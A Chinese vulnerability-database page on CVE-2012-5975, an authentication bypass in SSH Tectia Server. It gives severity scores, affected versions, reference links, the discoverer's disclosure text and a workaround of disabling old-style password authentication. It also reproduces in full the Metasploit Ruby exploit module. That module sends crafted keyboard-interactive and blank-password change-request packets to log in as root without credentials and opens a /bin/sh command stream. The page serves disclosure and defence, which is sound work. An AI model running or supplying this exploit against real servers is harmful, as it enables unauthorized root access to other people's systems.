CVE-2012-5975
CVSS9.3
发布时间 :2012-12-04 18:55:00
修订时间 :2012-12-05 00:00:00
NMCOES    

[原文]The SSH USERAUTH CHANGE REQUEST feature in SSH Tectia Server 6.0.4 through 6.0.20, 6.1.0 through 6.1.12, 6.2.0 through 6.2.5, and 6.3.0 through 6.3.2 on UNIX and Linux, when old-style password authentication is enabled, allows remote attackers to bypass authentication via a crafted session involving entry of blank passwords, as demonstrated by a root login session from a modified OpenSSH client with an added input_userauth_passwd_changereq call in sshconnect2.c.


[CNNVD]SSH Tectia Server 安全绕过漏洞(CNNVD-201212-043)

        SSH Tectia Server是商业性质的SSH服务器平台,适用于多种银行、保险等企业。
        基于UNIX和Linux系统上的SSH Tectia Server 6.0.4至6.0.20、6.1.0至6.1.12、6.2.0至6.2.5以及6.3.0至6.3.2版本中的‘SSH USERAUTH CHANGE REQUEST’函数中存在漏洞。当old-style密码身份验证启用时,通过包含空密码条目的特制会话(如来自修改OpenSSH客户端带有添加sshconnect2.c中的‘input_userauth_passwd_changereq’调用的根权限登录会话),远程攻击者利用该漏洞绕过身份验证。

- CVSS (基础分值)

CVSS分值: 9.3 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-287 [认证机制不恰当]

- CPE (受影响的平台与产品)

cpe:/a:ssh:tectia_server:6.0.6SSH Communications Security SSH Tectia Server 6.0.6
cpe:/a:ssh:tectia_server:6.1.2Ssh Tectia Server 6.1.2
cpe:/a:ssh:tectia_server:6.0.20.Ssh Tectia Server 6.0.20
cpe:/a:ssh:tectia_server:6.0.11SSH Communications Security SSH Tectia Server 6.0.11
cpe:/a:ssh:tectia_server:6.2.3Ssh Tectia Server 6.2.3
cpe:/a:ssh:tectia_server:6.0.12SSH Communications Security SSH Tectia Server 6.0.12
cpe:/a:ssh:tectia_server:6.2.5Ssh Tectia Server 6.2.5
cpe:/a:ssh:tectia_server:6.3.1Ssh Tectia Server 6.3.1
cpe:/a:ssh:tectia_server:6.1.6Ssh Tectia Server 6.1.6
cpe:/a:ssh:tectia_server:6.0.17SSH Communications Security SSH Tectia Server 6.0.17
cpe:/a:ssh:tectia_server:6.1.5Ssh Tectia Server 6.1.5
cpe:/a:ssh:tectia_server:6.1.1Ssh Tectia Server 6.1.1
cpe:/a:ssh:tectia_server:6.0.9SSH Communications Security SSH Tectia Server 6.0.9
cpe:/a:ssh:tectia_server:6.0.19SSH Communications Security SSH Tectia Server 6.0.19
cpe:/a:ssh:tectia_server:6.2.4Ssh Tectia Server 6.2.4
cpe:/a:ssh:tectia_server:6.2.1Ssh Tectia Server 6.2.1
cpe:/a:ssh:tectia_server:6.1.3Ssh Tectia Server 6.1.3
cpe:/a:ssh:tectia_server:6.2.2Ssh Tectia Server 6.2.2
cpe:/a:ssh:tectia_server:6.1.9Ssh Tectia Server 6.1.9
cpe:/a:ssh:tectia_server:6.1.0Ssh Tectia Server 6.1.0
cpe:/a:ssh:tectia_server:6.3.0Ssh Tectia Server 6.3.0
cpe:/a:ssh:tectia_server:6.0.13SSH Communications Security SSH Tectia Server 6.0.13
cpe:/a:ssh:tectia_server:6.0.18SSH Communications Security SSH Tectia Server 6.0.18
cpe:/a:ssh:tectia_server:6.1.7Ssh Tectia Server 6.1.7
cpe:/a:ssh:tectia_server:6.0.10SSH Communications Security SSH Tectia Server 6.0.10
cpe:/a:ssh:tectia_server:6.1.12Ssh Tectia Server 6.1.12
cpe:/a:ssh:tectia_server:6.3.2Ssh Tectia Server 6.3.2
cpe:/a:ssh:tectia_server:6.0.8SSH Communications Security SSH Tectia Server 6.0.8
cpe:/a:ssh:tectia_server:6.0.5SSH Communications Security SSH Tectia Server 6.0.5
cpe:/a:ssh:tectia_server:6.0.14SSH Communications Security SSH Tectia Server 6.0.14
cpe:/a:ssh:tectia_server:6.2.0Ssh Tectia Server 6.2.0
cpe:/a:ssh:tectia_server:6.1.4Ssh Tectia Server 6.1.4
cpe:/a:ssh:tectia_server:6.0.4SSH Communications Security SSH Tectia Server 6.0.4
cpe:/a:ssh:tectia_server:6.1.8Ssh Tectia Server 6.1.8
cpe:/a:ssh:tectia_server:6.0.7SSH Communications Security SSH Tectia Server 6.0.7

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5975
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5975
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-201212-043
(官方数据源) CNNVD

- 其它链接及资源

https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ssh/tectia_passwd_changereq.rb
(UNKNOWN)  MISC  https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ssh/tectia_passwd_changereq.rb
http://www.exploit-db.com/exploits/23082/
(UNKNOWN)  EXPLOIT-DB  23082
http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0065.html
(UNKNOWN)  FULLDISC  20121203 Re: SSH.com Communications SSH Tectia Authentication Bypass Remote Zeroday Exploit (king cope)
http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0013.html
(UNKNOWN)  FULLDISC  20121201 SSH.com Communications SSH Tectia Authentication Bypass Remote Zeroday Exploit

- 漏洞信息

SSH Tectia Server 安全绕过漏洞
高危 授权问题
2012-12-05 00:00:00 2012-12-05 00:00:00
远程  
        SSH Tectia Server是商业性质的SSH服务器平台,适用于多种银行、保险等企业。
        基于UNIX和Linux系统上的SSH Tectia Server 6.0.4至6.0.20、6.1.0至6.1.12、6.2.0至6.2.5以及6.3.0至6.3.2版本中的‘SSH USERAUTH CHANGE REQUEST’函数中存在漏洞。当old-style密码身份验证启用时,通过包含空密码条目的特制会话(如来自修改OpenSSH客户端带有添加sshconnect2.c中的‘input_userauth_passwd_changereq’调用的根权限登录会话),远程攻击者利用该漏洞绕过身份验证。

- 公告与补丁

        目前厂商还没有提供此漏洞的相关补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.ssh.com/

- 漏洞信息 (23082)

SSH.com Communications SSH Tectia Authentication Bypass Remote Zeroday Exploit (EDBID:23082)
linux remote
2012-12-02 Verified
0 Kingcope
N/A [点击下载]
http://www.exploit-db.com/sploits/23082.zip

SSH Tectia Remote Authentication Bypass
Tectia is the commercial OpenSSH solution. The product can be found at:
www.tectia.com
An attacker in the possession of a valid username of an SSH Tectia installation running on UNIX (verified: AIX/Linux) can login without a password.
The bug is in the SSH USERAUTH CHANGE REQUEST routines which are there to allow a user to change their password. A bug in this code allows an attacker to login without a password by forcing a password change request prior to authentication.

The vulnerability has been verified on UNIX operating systems and at least on this (recent) versions:
• SSH-2.0-6.1.9.95 SSH Tectia Server (Latest available version from www.tectia.com)
• SSH-2.0-6.0.11.5 SSH Tectia Server
A default installation on Linux (version 6.1.9.95 of Tectia) is vulnerable to the attack.

Kingcope		

- 漏洞信息 (23156)

Tectia SSH USERAUTH Change Request Password Reset Vulnerability (EDBID:23156)
unix remote
2012-12-05 Verified
0 metasploit
N/A [点击下载]
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'net/ssh'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Tectia SSH USERAUTH Change Request Password Reset Vulnerability",
			'Description'    => %q{
					This module exploits a vulnerability in Tectia SSH server for Unix-based
				platforms.  The bug is caused by a SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ request
				before password authentication, allowing any remote user to bypass the login
				routine, and then gain access as root.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'kingcope',  #Original 0day
					'bperry',
					'sinn3r'
				],
			'References'     =>
				[
					['EDB', '23082'],
					['URL', 'http://seclists.org/fulldisclosure/2012/Dec/12']
				],
			'Payload'        =>
				{
					'Compat' =>
					{
						'PayloadType'    => 'cmd_interact',
						'ConnectionType' => 'find'
					}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        =>
				[
					['Unix-based Tectia SSH 6.3.2.33 or prior', {}],
				],
			'Privileged'     => true,
			'DisclosureDate' => "Dec 01 2012",
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(22),
				OptString.new('USERNAME', [true, 'The username to login as', 'root'])
			], self.class
		)

		register_advanced_options(
			[
				OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
				OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
			]
		)
	end

	def check
		connect
		banner = sock.get_once
		print_status("#{rhost}:#{rport} - #{banner}")
		disconnect

		return Exploit::CheckCode::Appears if banner =~ /SSH Tectia/
		return Exploit::CheckCode::Safe
	end

	def rhost
		datastore['RHOST']
	end

	def rport
		datastore['RPORT']
	end

	#
	# This is where the login begins.  We're expected to use the keyboard-interactive method to
	# authenticate, but really all we want is skipping it so we can move on to the password
	# method authentication.
	#
	def auth_keyboard_interactive(user, transport)
		print_status("#{rhost}:#{rport} - Going through keyboard-interactive auth...")
		auth_req_pkt = Net::SSH::Buffer.from(
			:byte, 0x32,                     #userauth request
			:string, user,                   #username
			:string, "ssh-connection",       #service
			:string, "keyboard-interactive", #method name
			:string, "",                     #lang
			:string, ""
		)

		user_auth_pkt = Net::SSH::Buffer.from(
			:byte, 0x3D,                     #userauth info
			:raw, 0x01,                      #number of prompts
			:string, "",                     #password
			:raw, "\0"*32                    #padding
		)

		transport.send_message(auth_req_pkt)
		message = transport.next_message
		vprint_status("#{rhost}:#{rport} - Authentication to continue: keyboard-interactive")

		message = transport.next_message
		vprint_status("#{rhost}:#{rport} - Password prompt: #{message.inspect}")

		# USERAUTH INFO
		transport.send_message(user_auth_pkt)
		message = transport.next_message
		vprint_status("#{rhost}:#{rport} - Auths that can continue: #{message.inspect}")

		2.times do |i|
			#USRAUTH REQ
			transport.send_message(auth_req_pkt)
			message = transport.next_message
			vprint_status("#{rhost}:#{rport} - Password prompt: #{message.inspect}")

			# USERAUTH INFO
			transport.send_message(user_auth_pkt)
			message = transport.next_message
			vprint_status("#{rhost}:#{rport} - Auths that can continue: #{message.inspect}")
		end
	end


	#
	# The following link is useful to understand how to craft the USERAUTH password change
	# request packet:
	# http://fossies.org/dox/openssh-6.1p1/sshconnect2_8c_source.html#l00903
	#
	def userauth_passwd_change(user, transport, connection)
		print_status("#{rhost}:#{rport} - Sending USERAUTH Change request...")
		pkt = Net::SSH::Buffer.from(
			:byte, 0x32,               #userauth request
			:string, user,             #username
			:string, "ssh-connection", #service
			:string, "password"        #method name
		)
		pkt.write_bool(true)
		pkt.write_string("")           #Old pass
		pkt.write_string("")           #New pass

		transport.send_message(pkt)
		message = transport.next_message.type
		vprint_status("#{rhost}:#{rport} - Auths that can continue: #{message.inspect}")

		if message.to_i == 52 #SSH2_MSG_USERAUTH_SUCCESS
			transport.send_message(transport.service_request("ssh-userauth"))
			message = transport.next_message.type

			if message.to_i == 6 #SSH2_MSG_SERVICE_ACCEPT
				shell = Net::SSH::CommandStream.new(connection, '/bin/sh', true)
				connection = nil
				return shell
			end
		end
	end

	def do_login(user)
		opts       = {:user=>user, :record_auth_info=>true}
		options    = Net::SSH::Config.for(rhost, Net::SSH::Config.default_files).merge(opts)
		transport  = Net::SSH::Transport::Session.new(rhost, options)
		connection = Net::SSH::Connection::Session.new(transport, options)
		auth_keyboard_interactive(user, transport)
		userauth_passwd_change(user, transport, connection)
	end

	def exploit
		# Our keyboard-interactive is specific to Tectia.  This allows us to run quicker when we're
		# engaging a variety of SSHD targets on a network.
		if check != Exploit::CheckCode::Appears
			print_error("#{rhost}:#{rport} - Host does not seem vulnerable, will not engage.")
			return
		end

		c = nil

		begin
			::Timeout.timeout(datastore['SSH_TIMEOUT']) do
				c = do_login(datastore['USERNAME'])
			end
		rescue Rex::ConnectionError, Rex::AddressInUse
			return
		rescue Net::SSH::Disconnect, ::EOFError
			print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
			return
		rescue Net::SSH::Exception => e
			print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
			return
		rescue ::Timeout::Error
			print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
			return
		end

		handler(c.lsock) if c
	end
end
		

- 漏洞信息

88103
SSH Tectia Pre-authentication SSH USERAUTH CHANGE REQUEST Account Password Change Request Remote Authentication Bypass
Remote / Network Access Authentication Management
Loss of Integrity Workaround
Exploit Public Vendor Verified, Uncoordinated Disclosure

- 漏洞描述

SSH Tectia contains a flaw that is triggered in the SSH USERAUTH CHANGE REQUEST routine. This may allow a remote attacker to force a password change request before undergoing authentication. This will allow the attacker to change a user's password.

- 时间线

2012-12-02 Unknow
2012-12-01 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this vulnerability. It is possible to temporarily mitigate the flaw by implementing the following workaround: disable “old-style” password authentication by editing the /etc/ssh2/ssh-server-config.xml file and commenting out the auth-password line(s).

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

SSH Tectia Server Unauthorized Password Change Security Bypass Vulnerability
Design Error 56783
Yes No
2012-12-03 12:00:00 2013-04-02 03:57:00
Kingcope

- 受影响的程序版本

- 漏洞讨论

SSH Tectia Server is prone to a security-bypass vulnerability because it fails to adequately restrict access to the password-change feature.

An attacker can exploit this issue to change a user's password, thereby aiding in further attacks.

- 漏洞利用

The following exploit is available:

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- 解决方案

Updates are available. Please see the references or vendor advisory for more information.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站